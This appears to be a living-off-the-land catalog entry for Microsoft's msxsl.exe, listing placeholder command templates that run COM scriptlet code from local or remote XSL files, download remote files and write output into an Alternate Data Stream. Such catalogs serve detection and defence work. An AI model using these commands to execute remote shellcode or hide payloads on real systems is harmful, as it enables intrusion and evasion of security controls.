Command line utility used to perform XSL transformations.
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe {PATH:.xml} {PATH:.xsl}
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe {PATH:.xml} {PATH:.xsl}
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
Using remote XML and XSL files, save the transformed XML file to disk.
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name